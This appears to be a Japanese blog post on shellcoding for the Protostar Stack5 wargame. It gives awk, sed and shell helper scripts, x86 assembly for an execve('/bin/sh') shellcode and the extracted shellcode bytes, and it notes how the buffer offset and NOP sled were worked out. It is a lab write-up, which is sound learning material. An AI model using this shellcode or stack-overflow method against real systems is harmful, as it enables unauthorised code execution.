+++
date = "2016-09-07T17:28:19+09:00"
draft = false
title = "Shellcodingのためのスクリプト"

+++

ProtostarのStack5でシェルコーディングが必要だったので、久しぶりにシェルコーディングしていた。

objdumpの逆アセンブルの出力からPythonでexploit codeを書くのに、いちいち機械語をコピって整形するのが面倒なので、整形するスクリプトを書いた。
<!--more-->

### 機械語の抽出

objdumpの出力の2列目を取り出す。Awkを使った。

x-ml.awk

```
#!/usr/bin/awk -f

BEGIN {
  FS = "\t";
}

/^ [0-9a-f][0-9a-f]*:/ {
  print $2;
}
```

### 整形

Sedを使った。  
pp.sed

```
#!/bin/sed -f

:a
N
$! b a

s/\n//g
s/\s\s*/, /g
s/\([0-9a-f][0-9a-f]\)/0x\1/g
s/^/[/
s/, $/]/
```

これらをあわせて、  
extract-shellcode.sh

```
#!/bin/sh

d=`dirname $0`
f=$1
[ -z "$1" ] && exit 1

objdump -d "${f}" | ${d}/x-ml.awk | ${d}/pp.sed
```

### シェルコーディング

/bin/shを立ち上げるコードを書く。

```
.text
	.global	_start
_start:
	xor	%eax,	%eax
	push	%eax
	push	$0x68732f2f
	push	$0x6e69622f
	mov	%esp,	%ebx
	push	%eax
	push	%ebx
	mov	%esp,	%ecx
	mov	$0xb,	%al
	int	$0x80
```

これをアセンブルしてリンク。

```
$ as -o pwn.o pwn.s
$ ld -s -o pwn pwn.o
```

シェルコードを抽出

```
$ ./extract-shellcode.sh pwn
[0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x50, 0x53, 0x89, 0xe1, 0xb0, 0x0b, 0xcd, 0x80]
```

ProtostarのStack5はASLR無効であっても、スタックポインターの位置を完全には予測できないことを教えてくれる。

ぼくは `ltrace` で `gets` の引数を覗いて、そこからバッファーの位置を特定した。そして、"A"という文字列を64から少しずつ長くしていって、その都度ペイロードを流し込み、バッファーのret addrからのオフセットを特定した。これらの情報があれば、NOP sledすら必要ないのだけど、実際のexploitではNOP sledをバッファーの1/2程度挿入した。
